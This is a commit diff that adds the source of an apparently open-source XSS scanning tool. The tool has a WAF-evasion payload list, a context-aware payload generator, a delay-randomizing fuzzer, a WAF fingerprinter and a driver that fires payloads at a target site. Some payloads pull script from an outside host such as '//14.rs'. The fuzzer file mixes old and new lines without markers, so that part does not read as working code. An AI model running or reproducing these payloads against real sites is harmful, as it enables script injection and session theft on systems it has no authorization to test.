Add files via upload
core/checker.py (new file, 19 lines)
@@ -0,0 +1,19 @@
import re
import copy
from fuzzywuzzy import fuzz
from core.utils import replacer
from core.config import xsschecker
from urllib.parse import quote_plus
from core.requester import requester


def checker(url, params, headers, GET, delay, payload):
    checkString = 'st4r7' + payload
    paramsCopy = copy.deepcopy(params)
    response = requester(url, replacer(paramsCopy, xsschecker, checkString), headers, GET, delay).text.lower()
    # Iterating over the reflections
    efficiencies = []
    for m in re.finditer('st4r7', response):
        reflected = response[m.start():m.start() + len(checkString)]
        efficiency = fuzz.partial_ratio(reflected, checkString.lower())
        efficiencies.append(efficiency)
    return efficiencies
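For reference, a minimal sketch (not part of the commit) of how the fuzzywuzzy similarity score used above behaves when a reflection is partially filtered; the strings are made up for illustration:

from fuzzywuzzy import fuzz

payload = 'st4r7<svg onload=confirm()>'
intact = 'st4r7<svg onload=confirm()>'          # reflected untouched
mangled = 'st4r7&lt;svg onload=confirm()&gt;'   # angle brackets HTML-encoded by the server

print(fuzz.partial_ratio(intact.lower(), payload.lower()))   # 100 -> payload survives as-is
print(fuzz.partial_ratio(mangled.lower(), payload.lower()))  # lower score -> partially filtered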
core/colors.py (new file, 12 lines)
@@ -0,0 +1,12 @@
white = '\033[97m'
dgreen = '\033[32m'
green = '\033[92m'
red = '\033[91m'
yellow = '\033[93m'
end = '\033[0m'
back = '\033[7;91m'
info = '\033[93m[!]\033[0m'
que = '\033[94m[?]\033[0m'
bad = '\033[91m[-]\033[0m'
good = '\033[92m[+]\033[0m'
run = '\033[97m[~]\033[0m'
core/config.py (new file, 67 lines)
@@ -0,0 +1,67 @@
xsschecker = 'v3dm0s'  # A non-malicious string used to check for reflections

minEfficiency = 90

delay = 0
threads = 2
timeout = 7

badTags = ('iframe', 'title', 'textarea', 'noembed', 'style', 'template', 'noscript')

tags = ('html', 'd3v', 'a', 'details')  # HTML tags

jFillings = ('-', '*', ';', '/')
lFillings = ('', ' x')
eFillings = ('%09', '%0a', '%0d', '+')  # "Things" to use between an event handler and = or between a function and =
fillings = ('%09', '%0a', '%0d', '/+/')  # "Things" to use instead of a space

eventHandlers = {  # Event handlers and the tags compatible with them
    'ontoggle': ['details'],
    'onpointerenter': ['d3v', 'details', 'html', 'a'],
    'onmouseover': ['a', 'html', 'd3v']
}

functions = (  # JavaScript functions to get a popup
    '[8].find(confirm)', 'confirm()',
    '(confirm)()', 'co\u006efir\u006d()',
    '(prompt)``', 'a=prompt,a()')

payloads = (  # Payloads for filter & WAF evasion
    '\'"</Script><Html Onmouseover=(confirm)()//',
    '<imG/sRc=l oNerrOr=(prompt)() x>',
    '<!--<iMg sRc=--><img src=x oNERror=(prompt)`` x>',
    '<deTails open oNToggle=confi\u0072m()>',
    '<img sRc=l oNerrOr=(confirm)() x>',
    '<svg/x=">"/onload=confirm()//',
    '<svg%0Aonload=%09((pro\u006dpt))()//',
    '<iMg sRc=x:confirm`` oNlOad=e\u0076al(src)>',
    '<sCript x>confirm``</scRipt x>',
    '<Script x>prompt()</scRiPt x>',
    '<sCriPt sRc=//14.rs>',
    '<embed//sRc=//14.rs>',
    '<base href=//14.rs/><script src=/>',
    '<object//data=//14.rs>',
    '<s=" onclick=confirm``>clickme',
    '<svG oNLoad=co\u006efirm(1)>',
    '\'"><y///oNMousEDown=((confirm))()>Click',
    '<a/href=javascript:co\u006efirm("1")>clickme</a>',
    '<img src=x onerror=confir\u006d`1`>',
    '<svg/onload=co\u006efir\u006d`1`>')

fuzzes = (  # Fuzz strings to test WAFs
    '<test', '<test//', '<test>', '<test x>', '<test x=y', '<test x=y//',
    '<test/oNxX=yYy//', '<test oNxX=yYy>', '<test onload=x', '<test/o%00nload=x',
    '<test sRc=xxx', '<test data=asa', '<test data=javascript:asa', '<svg x=y>',
    '<details x=y//', '<a href=x//', '<emBed x=y>', '<object x=y//', '<bGsOund sRc=x>',
    '<iSinDEx x=y//', '<aUdio x=y>', '<script x=y>', '<script//src=//', '">payload<br/attr="',
    '"-confirm``-"', '<test ONdBlcLicK=x>', '<test/oNcoNTeXtMenU=x>', '<test OndRAgOvEr=x>')

headers = {
    'User-Agent': '$',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip,deflate',
    'Connection': 'close',
    'DNT': '1',
    'Upgrade-Insecure-Requests': '1',
}
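A side note on the \u escapes in the functions and payloads above: Python resolves them when the module is parsed, so the strings are equal to their plain forms. A quick check (illustrative, not part of the commit):

print('co\u006efir\u006d()')                 # prints: confirm()
print('co\u006efir\u006d()' == 'confirm()')  # True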
core/dom.py (new file, 30 lines)
@@ -0,0 +1,30 @@
import re
from core.colors import red, end, yellow


def dom(response):
    result = False
    highlighted = []
    response = response.split('\n')
    SOURCES_RE = r"""location\.|\.([.\[]\s*["']?\s*arguments|dialogArguments|innerHTML|write|open|showModalDialog|cookie|URL|documentURI|baseURI|referrer|name|opener|parent|top|content|self|frames)\b|(localStorage|sessionStorage|Database)\b"""
    SINKS_RE = r"""( (src|href|data|location|code|value|action)=)|(replace|assign|navigate|getResponseHeader|open|showModalDialog|eval|evaluate|execCommand|execScript|setTimeout|setInterval)\("""
    num = 1
    for newLine in response:
        line = newLine
        pattern = re.findall(SOURCES_RE, line)
        for grp in pattern:
            source = ''.join(grp)
            line = line.replace(source, yellow + source + end)
        pattern = re.findall(SINKS_RE, line)
        for grp in pattern:
            sink = ''.join(grp)
            line = line.replace(sink, red + sink + end)
        if line != newLine:
            highlighted.append('%-3s %s' % (str(num), line.lstrip(' ')))
        num += 1
    if highlighted:
        print(red + ('-' * 60) + end)
        result = True
        for line in highlighted:
            print(line)
        print(red + ('-' * 60) + end)
    return result
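A quick, illustrative way to exercise dom() (not part of the commit); it prints any lines matching its source/sink patterns and returns True when something was flagged:

from core.dom import dom

page = '<script>var q = location.hash; eval(q);</script>'
print(dom(page))  # True -> the line matched a DOM source/sink pattern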
core/filterChecker.py (new file, 30 lines)
@@ -0,0 +1,30 @@
from core.utils import replacer
from core.checker import checker
from core.config import xsschecker
from core.requester import requester


def filterChecker(url, params, headers, GET, delay, occurences):
    environments = set(['<', '>'])
    sortedEfficiencies = {}
    for i in range(len(occurences.values())):
        sortedEfficiencies[i] = {}
    for occurence in occurences.values():
        environments.add(occurence['context'][1])
        location = occurence['context'][0]
        if location == 'comment':
            environments.add('-->')
        elif location == 'script':
            environments.add('</scRipT/>')
    for environment in environments:
        if environment == '':
            efficiencies = [100 for i in range(len(occurences))]
        else:
            efficiencies = checker(url, params, headers, GET, delay, environment)
            if not efficiencies:
                for i in range(len(occurences)):
                    efficiencies.append(0)
        for i, efficiency in zip(range(len(efficiencies)), efficiencies):
            sortedEfficiencies[i][environment] = efficiency
    for efficiency, occurence in zip(sortedEfficiencies.values(), occurences.values()):
        occurence['score'] = efficiency
    return occurences
core/fuzzer.py (modified; the hunks below interleave the removed lines and their replacements)
@@ -1,52 +1,38 @@
import sys
import requests
from prettytable import PrettyTable  # Module to print a table of results
from urllib.parse import quote_plus
from core.make_request import make_request
import copy
from time import sleep
from random import randint
from core.utils import replacer
from urllib.parse import quote_plus
from core.requester import requester
from core.config import fuzzes, xsschecker
from core.colors import end, red, white, green, yellow, run, bad, good, info, que

green = '\033[92m'
red = '\033[91m'
yellow = '\033[93m'
end = '\033[0m'
info = '\033[93m[!]\033[0m'
bad = '\033[91m[-]\033[0m'
run = '\033[97m[~]\033[0m'
def counter(string):
    special = '\'"=/:*&)(}{][><'
    count = 0
    for char in list(string):
        if char in special:
            count += 1
    return count

# "Not so malicious" payloads for fuzzing
fuzzes = ['<test', '<test//', '<test>', '<test x>', '<test x=y', '<test x=y//',
          '<test/oNxX=yYy//', '<test oNxX=yYy>', '<test onload=x', '<test/o%00nload=x',
          '<test sRc=xxx', '<test data=asa', '<test data=javascript:asa', '<svg x=y>',
          '<details x=y//', '<a href=x//', '<emBed x=y>', '<object x=y//', '<bGsOund sRc=x>',
          '<iSinDEx x=y//', '<aUdio x=y>', '<script x=y>', '<script//src=//', '">payload<br/attr="',
          '"-confirm``-"', '<test ONdBlcLicK=x>', '<test/oNcoNTeXtMenU=x>', '<test OndRAgOvEr=x>']

def fuzzer(url, param_data, method, delay, xsschecker, cookie):
    result = []  # Result of fuzzing
    progress = 0  # Variable for recording the progress of fuzzing
    for i in fuzzes:
        progress = progress + 1
        sleep(delay)  # Pausing the program. Default = 0 sec. In case of WAF = 6 sec.
        sys.stdout.write('\r%s Fuzz Sent: %i/%i' % (run, progress, len(fuzzes)))
        sys.stdout.flush()
        fuzzy = quote_plus(i)  # URL encoding the payload
        param_data_injected = param_data.replace(xsschecker, fuzzy)  # Replacing the xsschecker with the fuzz
def fuzzer(url, params, headers, GET, delay, WAF):
    for fuzz in fuzzes:
        if delay == 0:
            delay = 6
        t = delay + randint(delay, delay * 2) + counter(fuzz)
        sleep(t)
        paramsCopy = copy.deepcopy(params)
        try:
            if method == 'GET':  # GET parameter
                r = requests.get(url + param_data_injected, timeout=10, cookies=cookie)  # makes a request to example.search.php?q=<fuzz>
            else:  # POST parameter
                r = requests.post(url, data=param_data_injected, timeout=10, cookies=cookie)  # Separating "param_data_injected" with a comma because it's POST data
            response = r.text
            response = requester(url, replacer(paramsCopy, xsschecker, fuzz), headers, GET, delay / 2)
        except:
            print('\n%s WAF is dropping suspicious requests.' % bad)
            if delay == 0:
                print('%s Delay has been increased to %s6%s seconds.' % (info, green, end))
                delay += 6
            limit = (delay + 1) * 2
            limit = (delay + 1) * 50
            timer = -1
            while timer < limit:
                sys.stdout.write('\r%s Fuzzing will continue after %s%i%s seconds.' % (info, green, limit, end))
                sys.stdout.flush()
                print('\r%s Fuzzing will continue after %s%i%s seconds.\t\t' % (info, green, limit, end), end='\r')
                limit -= 1
                sleep(1)
            try:
@@ -55,20 +41,10 @@ def fuzzer(url, param_data, method, delay, xsschecker, cookie):
            except:
                print('\n%s Looks like the WAF has blocked our IP address. Sorry!' % bad)
                break
        if i in response:  # if the fuzz string is reflected in the response / source code
            result.append({
                'result': '%sWorks%s' % (green, end),
                'fuzz': i})
        elif str(r.status_code)[:1] != '2':  # if the server returned an error (maybe the WAF blocked it)
            result.append({
                'result': '%sBlocked%s' % (red, end),
                'fuzz': i})
        if fuzz.lower() in response.text.lower():  # if the fuzz string is reflected in the response
            result = ('%s[passed] %s' % (green, end))
        elif str(response.status_code)[:1] != '2':  # if the server returned an error (maybe the WAF blocked it)
            result = ('%s[blocked] %s' % (red, end))
        else:  # if the fuzz string was not reflected in the response completely
            result.append({
                'result': '%sFiltered%s' % (yellow, end),
                'fuzz': i})
    table = PrettyTable(['Fuzz', 'Response'])  # Creates a table with two columns
    for value in result:
        table.add_row([value['fuzz'], value['result']])  # Adds the fuzz and its result to the columns
    print('\n', table)
    quit()
        result = ('%s[filtered]%s' % (yellow, end))
        print('%s %s' % (result, fuzz))
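Assuming the new counter() helper ships in core/fuzzer.py as shown above, it simply tallies the special characters in a fuzz string so that the randomized sleep grows with payload complexity (illustrative, not part of the commit):

from core.fuzzer import counter   # assumes counter() lands in core/fuzzer.py as above

print(counter('<test x=y//'))     # 4 -> '<', '=', and the two '/'
print(counter('"-confirm``-"'))   # 2 -> the two double quotes (backticks are not counted)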
core/generator.py (new file, 98 lines)
@@ -0,0 +1,98 @@
from core.jsContexter import jsContexter
from core.utils import randomUpper as r, genGen, extractScripts
from core.config import badTags, fillings, eFillings, lFillings, jFillings, eventHandlers, tags, functions


def generator(occurences, response):
    scripts = extractScripts(response)
    index = 0
    vectors = {10: set(), 9: set(), 8: set(), 7: set(), 6: set(), 5: set(), 4: set(), 3: set(), 2: set(), 1: set()}
    for i in occurences:
        context = occurences[i]['context'][0]
        breaker = occurences[i]['context'][1]
        special = occurences[i]['context'][2]
        if special not in badTags:
            special = ''
        elif context == 'attribute':
            special = '</' + special + '/>'
        else:
            special = ''
        attribute = occurences[i]['context'][3]
        if context == 'html':
            lessBracketEfficiency = occurences[i]['score']['<']
            greatBracketEfficiency = occurences[i]['score']['>']
            breakerEfficiency = occurences[i]['score'][breaker]
            ends = ['//']
            if greatBracketEfficiency == 100:
                ends.append('>')
            if lessBracketEfficiency == breakerEfficiency == 100:
                payloads = genGen(fillings, eFillings, lFillings, eventHandlers, tags, functions, ends, breaker, special)
                for payload in payloads:
                    vectors[10].add(payload)
        elif context == 'attribute':
            breakerEfficiency = occurences[i]['score'][breaker]
            greatBracketEfficiency = occurences[i]['score']['>']
            ends = ['//']
            if greatBracketEfficiency == 100:
                ends.append('>')
            if greatBracketEfficiency == 100 and breakerEfficiency == 100:
                payloads = genGen(fillings, eFillings, lFillings, eventHandlers, tags, functions, ends, breaker, special)
                for payload in payloads:
                    if breaker:
                        payload = payload.replace(breaker, breaker + '>')
                    else:
                        payload = '>' + payload
                    vectors[10].add(payload)
            if breakerEfficiency == 100:
                for filling in fillings:
                    for function in functions:
                        vector = breaker + filling + 'auTOfOcuS' + filling + 'OnFoCUs' + '=' + breaker + function
                        vectors[6].add(vector)
        elif context == 'comment':
            lessBracketEfficiency = occurences[i]['score']['<']
            greatBracketEfficiency = occurences[i]['score']['>']
            breakerEfficiency = occurences[i]['score'][breaker]
            ends = ['//']
            if greatBracketEfficiency == 100:
                ends.append('>')
            if lessBracketEfficiency == breakerEfficiency == 100:
                payloads = genGen(fillings, eFillings, lFillings, eventHandlers, tags, functions, ends, breaker, special)
                for payload in payloads:
                    vectors[10].add(payload)
        elif context == 'script':
            try:
                script = scripts[index]
            except IndexError:
                script = scripts[0]
            closer = jsContexter(script)
            validBreakers = ['\'', '"', '`']
            scriptEfficiency = occurences[i]['score']['</scRipT/>']
            greatBracketEfficiency = occurences[i]['score']['>']
            breakerEfficiency = occurences[i]['score'][breaker]
            ends = ['//']
            if greatBracketEfficiency == 100:
                ends.append('>')
            if scriptEfficiency == 100:
                breaker = r('</script/>')
                payloads = genGen(fillings, eFillings, lFillings, eventHandlers, tags, functions, ends, breaker, special)
                for payload in payloads:
                    vectors[10].add(payload)
            if closer:
                suffix = '//\\'
                if not breaker:
                    closer = closer[1:]
                for filling in jFillings:
                    for function in functions:
                        vector = closer + filling + function + suffix
                        vectors[7].add(vector)
            elif breakerEfficiency >= 83:
                suffix = '//'
                for filling in jFillings:
                    for function in functions:
                        if '=' in function:
                            function = '(' + function + ')'
                        if breaker == '':
                            filling = ''
                        vector = '\\' + breaker + closer + filling + function + suffix
                        vectors[6].add(vector)
            index += 1
    return vectors
core/htmlParser.py (new file, 65 lines)
@@ -0,0 +1,65 @@
import re
from core.config import badTags
from core.config import xsschecker


def htmlParser(response):
    tags = []  # tags in which the input is reflected
    locations = []  # contexts in which the input is reflected
    attributes = []  # attribute names
    environments = []  # strings needed to break out of the context
    parts = response.split(xsschecker)
    parts.remove(parts[0])  # remove the first element since it doesn't contain xsschecker
    parts = [xsschecker + s for s in parts]  # add xsschecker in front of all elements
    for part in parts:  # iterate over the parts
        deep = part.split('>')
        if '</script' in deep[0]:
            location = 'script'
        elif '</' in deep[0]:
            location = 'html'
        elif deep[0][-2:] == '--':
            location = 'comment'
        else:
            location = 'script'
        for char in part:
            if char == '<':
                location = 'attribute'
                break
        locations.append(location)  # add the location to the locations list
    num = 0  # dummy value to keep a record of the occurrence being processed
    for occ in re.finditer(xsschecker, response, re.IGNORECASE):  # find xsschecker in the response and return matches
        toLook = list(response[occ.end():])  # convert "xsschecker to EOF" into a list
        for loc in range(len(toLook)):  # iterate over the chars
            if toLook[loc] in ('\'', '"', '`'):  # if the char is a quote
                environments.append(toLook[loc])  # add it to the environments list
                tokens = response.split('<')
                goodTokens = []  # tokens which contain xsschecker
                for token in tokens:  # iterate over the tokens
                    if xsschecker in token:  # if xsschecker is in the token
                        goodTokens.append(token)  # add it to the goodTokens list
                        attrs = token.split(' ')
                        for attr in attrs:
                            if xsschecker in attr:
                                attributes.append(attr.split('=')[0])
                                break
                tag = re.search(r'\w+', goodTokens[num]).group()  # finds the tag "inside" which the input is reflected
                tags.append(tag)  # add the tag to the tags list
                break
            elif toLook[loc] == '<':
                if toLook[loc + 1] == '/':
                    tag = ''.join(toLook).split('</')[1].split('>')[0]
                    if tag in badTags:
                        environments.append('</' + tag + '/>')
                    else:
                        environments.append('')
                    tags.append(tag)
                    attributes.append('')
                break
            loc += 1
        num += 1
    occurences = {}
    for i, loc, env, tag, attr in zip(range(len(locations)), locations, environments, tags, attributes):
        occurences[i] = {}
        if loc == 'comment':
            value = '-->'
        occurences[i]['context'] = [loc, env, tag, attr]
    return occurences
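Illustrative only (not part of the commit): the shape of the dictionary htmlParser returns for a single reflection inside an attribute value:

from core.htmlParser import htmlParser

html = '<html><body><input value="v3dm0s"></body></html>'
print(htmlParser(html))
# {0: {'context': ['attribute', '"', 'input', 'value']}}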
core/jsContexter.py (new file, 21 lines)
@@ -0,0 +1,21 @@
import re
from core.config import xsschecker


def jsContexter(script):
    broken = script.split(xsschecker)
    pre = broken[0]
    pre = re.sub(r'(?s)\{.*?\}|(?s)\(.*?\)|(?s)".*?"|(?s)\'.*?\'', '', pre)
    breaker = []
    num = 0
    for char in pre:
        if char == '{':
            breaker.append('}')
        elif char == '(':
            breaker.append(');')
        elif char == '[':
            breaker.append(']')
        elif char == '/':
            if pre[num + 1] == '*':
                breaker.append('*/')
        num += 1
    return ''.join(breaker[::-1])
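Illustrative only: jsContexter() works out which closers are needed to break out of the JavaScript nesting that precedes the reflection:

from core.jsContexter import jsContexter

script = 'if (a) { track(v3dm0s) }'   # v3dm0s marks where the input lands
print(jsContexter(script))            # ');}' -> close the call, then the block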
core/requester.py (new file, 18 lines)
@@ -0,0 +1,18 @@
import time
import random
import warnings
import requests

warnings.filterwarnings('ignore')  # Disable SSL related warnings


def requester(url, data, headers, GET, delay):
    time.sleep(delay)
    user_agents = ['Mozilla/5.0 (X11; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0',
                   'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
                   'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 OPR/43.0.2442.991']
    headers['User-Agent'] = random.choice(user_agents)
    if GET:
        response = requests.get(url, params=data, headers=headers, verify=False)
    else:
        response = requests.post(url, data=data, headers=headers, verify=False)
    return response
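A minimal usage sketch (the target URL is a placeholder, not from the commit):

from core.config import headers
from core.requester import requester

params = {'q': 'v3dm0s'}
response = requester('http://example.com/search.php', params, headers, GET=True, delay=0)
print(response.status_code, len(response.text))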
core/updater.py (new file, 30 lines)
@@ -0,0 +1,30 @@
import re
import os
from requests import get
from core.colors import run, que, good, info, red, end, green


def updater():
    print('%s Checking for updates' % run)
    changes = ''''''  # Changes must be separated by ;
    latestCommit = get('https://raw.githubusercontent.com/s0md3v/XSStrike/master/xsstrike').text

    if changes not in latestCommit:  # just a hack to see if a new version is available
        changelog = re.search(r"changes = '''(.*?)'''", latestCommit)
        changelog = changelog.group(1).split(';')  # splitting the changes to form a list
        print('%s A new version of XSStrike is available.' % good)
        print('%s Changes:' % info)
        for change in changelog:  # print the changes
            print('%s>%s %s' % (green, end, change))

        currentPath = os.getcwd().split('/')  # if you know it, you know it
        folder = currentPath[-1]  # current directory name
        path = '/'.join(currentPath)  # current directory path
        choice = input('%s Would you like to update? [Y/n] ' % que).lower()

        if choice != 'n':
            print('%s Updating XSStrike' % run)
            os.system('git clone --quiet https://github.com/s0md3v/XSStrike %s' % (folder))
            os.system('cp -r %s/%s/* %s && rm -r %s/%s/ 2>/dev/null' % (path, folder, path, path, folder))
            print('%s Update successful!' % good)
    else:
        print('%s XSStrike is up to date!' % good)
core/utils.py (new file, 74 lines)
@@ -0,0 +1,74 @@
import re
import random
from core.config import xsschecker


def replacer(dic, toReplace, replaceWith):
    for key in dic.keys():
        if dic[key] == toReplace:
            dic[key] = replaceWith
    return dic


def getUrl(url, data, GET):
    if GET:
        return url.split('?')[0]
    else:
        return url


def extractScripts(response):
    scripts = []
    matches = re.findall(r'(?s)<script.*?>(.*?)</script>', response.lower())
    for match in matches:
        if xsschecker in match:
            scripts.append(match)
    return scripts


def randomUpper(string):
    return ''.join(random.choice((x, y)) for x, y in zip(string.upper(), string.lower()))


def flattenParams(currentParam, params, payload):
    flatted = []
    for name, value in params.items():
        if name == currentParam:
            value = payload
        flatted.append(name + '=' + value)
    return '?' + '&'.join(flatted)


def genGen(fillings, eFillings, lFillings, eventHandlers, tags, functions, ends, breaker, special):
    vectors = []
    r = randomUpper
    for tag in tags:
        if tag == 'd3v' or tag == 'a':
            bait = 'z'
        else:
            bait = ''
        for eventHandler in eventHandlers:
            if tag in eventHandlers[eventHandler]:
                for function in functions:
                    for filling in fillings:
                        for eFilling in eFillings:
                            for lFilling in lFillings:
                                for end in ends:
                                    if tag == 'd3v' or tag == 'a':
                                        if '>' in ends:
                                            end = '>'
                                    vector = r(breaker) + special + '<' + r(tag) + filling + r(eventHandler) + eFilling + '=' + eFilling + function + lFilling + end + bait
                                    vectors.append(vector)
    return vectors


def getParams(url, data, GET):
    params = {}
    if GET:
        if '=' in url:
            data = url.split('?')[1]
            if data[:1] == '?':
                data = data[1:]
        else:
            data = ''
    parts = data.split('&')
    for part in parts:
        each = part.split('=')
        try:
            params[each[0]] = each[1]
        except IndexError:
            params = None
    return params
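Illustrative only: expected behaviour of a few of the helpers above:

from core.utils import replacer, randomUpper, flattenParams

print(replacer({'q': 'v3dm0s', 'page': '1'}, 'v3dm0s', '<svg>'))
# {'q': '<svg>', 'page': '1'}

print(flattenParams('q', {'q': 'v3dm0s', 'page': '1'}, '<svg onload=confirm()>'))
# ?q=<svg onload=confirm()>&page=1

print(randomUpper('onmouseover'))
# e.g. oNmOUseOVer (casing is randomized on every call)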
core/wafDetector.py (new file, 37 lines)
@@ -0,0 +1,37 @@
import re
from core.requester import requester


def wafDetector(url, params, headers, GET, delay):
    noise = '<script>alert(1)</script>'  # a payload which is noisy enough to provoke the WAF
    params['xss'] = noise
    response = requester(url, params, headers, GET, delay)  # sends the noisy payload
    code = str(response.status_code)
    response_headers = str(response.headers)
    response_text = response.text.lower()
    WAF_Name = ''
    if code[:1] != '2':
        if code == '406' or code == '501':  # if the http response code is 406/501
            WAF_Name = 'Mod_Security'
        elif 'wordfence' in response_text:
            WAF_Name = 'Wordfence'
        elif code == '999':  # if the http response code is 999
            WAF_Name = 'WebKnight'
        elif 'has disallowed characters' in response_text:
            WAF_Name = 'CodeIgniter'
        elif '<hr><center>nginx</center>' in response_text:
            WAF_Name = 'nginx'
        elif 'comodo' in response_text:
            WAF_Name = 'Comodo'
        elif 'sucuri' in response_text:
            WAF_Name = 'Sucuri'
        elif code == '419':  # if the http response code is 419
            WAF_Name = 'F5 BIG IP'
        elif 'barra' in response_headers:
            WAF_Name = 'Barracuda'
        elif re.search(r'cf[-|_]ray', response_headers):
            WAF_Name = 'Cloudflare'
        elif 'AkamaiGHost' in response_headers:
            WAF_Name = 'AkamaiGhost'
        elif code == '403':  # if the http response code is 403
            WAF_Name = 'Unknown'
    return WAF_Name
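A hypothetical call (the URL and parameter are placeholders); an empty return value means no known WAF fingerprint matched:

from core.config import headers
from core.wafDetector import wafDetector

waf = wafDetector('http://example.com/page.php', {'q': 'v3dm0s'}, headers, True, 0)
print(waf if waf else 'no WAF fingerprint matched')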
xsstrike.py (new file, 166 lines)
@@ -0,0 +1,166 @@
#!/usr/bin/env python3

from __future__ import print_function

from core.colors import end, red, white, green, yellow, run, bad, good, info, que

# Just a fancy ass banner
print('''%s _ _ _
 _ _ ___ ___| |_ ___|_| |_ ___
|_'_|_ -|_ -| _| _| | '_| -_|
|_,_|___|___|_| |_| |_|_,_|___|
%s''' % (red, end))

try:
    from urllib.parse import unquote, urlparse
except ImportError:  # throws an error in python2
    print('%s XSStrike isn\'t compatible with python2.' % bad)
    quit()

# Let's import whatever we need
import re
import os
import sys
import copy
import argparse
import requests
import webbrowser
import concurrent.futures

import core.config
from core.dom import dom
from core.fuzzer import fuzzer
from core.updater import updater
from core.checker import checker
from core.generator import generator
from core.requester import requester
from core.htmlParser import htmlParser
from core.wafDetector import wafDetector
from core.filterChecker import filterChecker
from core.utils import getUrl, getParams, flattenParams
from core.config import headers, xsschecker, minEfficiency

# Processing command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', help='url', dest='target')
parser.add_argument('--data', help='post data', dest='data')
parser.add_argument('-c', '--cookie', help='cookie', dest='cookie')
parser.add_argument('-t', '--threads', help='number of threads', dest='threads')
parser.add_argument('--fuzzer', help='fuzzer', dest='fuzz', action='store_true')
parser.add_argument('--update', help='update', dest='update', action='store_true')
parser.add_argument('--timeout', help='timeout', dest='timeout', action='store_true')
parser.add_argument('--params', help='find params', dest='find', action='store_true')
parser.add_argument('-d', '--delay', help='delay between requests', dest='delay', type=int)
args = parser.parse_args()

find = args.find
fuzz = args.fuzz
target = args.target
cookie = args.cookie
paramData = args.data
delay = args.delay or core.config.delay
threads = args.threads or core.config.threads
timeout = args.timeout or core.config.timeout

if paramData:
    GET, POST = False, True
else:
    GET, POST = True, False

if args.update:  # if the user has supplied the --update argument
    updater()
    quit()  # quitting because files have been changed

if not target:  # if the user hasn't supplied a url
    print('\n' + parser.format_help().lower())
    quit()

# If the user hasn't supplied the root url with http(s), we will handle it
if target.startswith('http'):
    target = target
else:
    try:
        response = requests.get('https://' + target)
        target = 'https://' + target
    except:
        target = 'http://' + target
try:
    response = requests.get(target).text
    print('%s Checking for DOM vulnerabilities' % run)
    if dom(response):
        print('%s Potentially vulnerable objects found' % good)
except Exception as e:
    print('%s Unable to connect to the target' % bad)
    print('%s Error: %s' % (bad, e))
    quit()

host = urlparse(target).netloc  # Extracts the host out of the url
url = getUrl(target, paramData, GET)
params = getParams(target, paramData, GET)
if not params and not find:
    quit()
WAF = wafDetector(url, {list(params.keys())[0]: xsschecker}, headers, GET, delay)
if WAF:
    print('%s WAF detected: %s%s%s' % (bad, green, WAF, end))
else:
    print('%s WAF Status: %sOffline%s' % (good, green, end))

if fuzz:
    for paramName in params.keys():
        print('%s Fuzzing parameter: %s' % (info, paramName))
        paramsCopy = copy.deepcopy(params)
        paramsCopy[paramName] = xsschecker
        fuzzer(url, paramsCopy, headers, GET, delay, WAF)
    quit()

for paramName in params.keys():
    paramsCopy = copy.deepcopy(params)
    print('%s Testing parameter: %s' % (info, paramName))
    paramsCopy[paramName] = xsschecker
    response = requester(url, paramsCopy, headers, GET, delay).text
    occurences = htmlParser(response)
    if not occurences:
        print('%s No reflection found' % bad)
        continue
    else:
        print('%s Reflections found: %s' % (info, len(occurences)))
    print('%s Analysing reflections' % run)
    efficiencies = filterChecker(url, paramsCopy, headers, GET, delay, occurences)
    print('%s Generating payloads' % run)
    vectors = generator(occurences, response)
    total = 0
    for v in vectors.values():
        total += len(v)
    if total == 0:
        print('%s No vectors were crafted' % bad)
        continue
    print('%s Payloads generated: %i' % (info, total))
    progress = 0
    for confidence, vects in vectors.items():
        for vect in vects:
            progress += 1
            print('%s Payloads tried [%i/%i]' % (run, progress, total), end='\r')
            if not GET:
                vect = unquote(vect)
            efficiencies = checker(url, paramsCopy, headers, GET, delay, vect)
            if not efficiencies:
                for i in range(len(occurences)):
                    efficiencies.append(0)
            bestEfficiency = max(efficiencies)
            if bestEfficiency == 100 or (vect[0] == '\\' and bestEfficiency >= 95):
                print(('%s-%s' % (red, end)) * 60)
                print('%s Payload: %s' % (good, vect))
                print('%s Efficiency: %i' % (info, bestEfficiency))
                print('%s Confidence: %i' % (info, confidence))
                if GET:
                    flatParams = flattenParams(paramName, paramsCopy, vect)
                    if '"' not in flatParams and '}' not in flatParams:
                        webbrowser.open(url + flatParams)
                choice = input('%s Would you like to continue scanning? [y/N] ' % que).lower()
                if choice != 'y':
                    quit()
            elif bestEfficiency > minEfficiency:
                print(('%s-%s' % (red, end)) * 60)
                print('%s Payload: %s' % (good, vect))
                print('%s Efficiency: %i' % (info, bestEfficiency))
                print('%s Confidence: %i' % (info, confidence))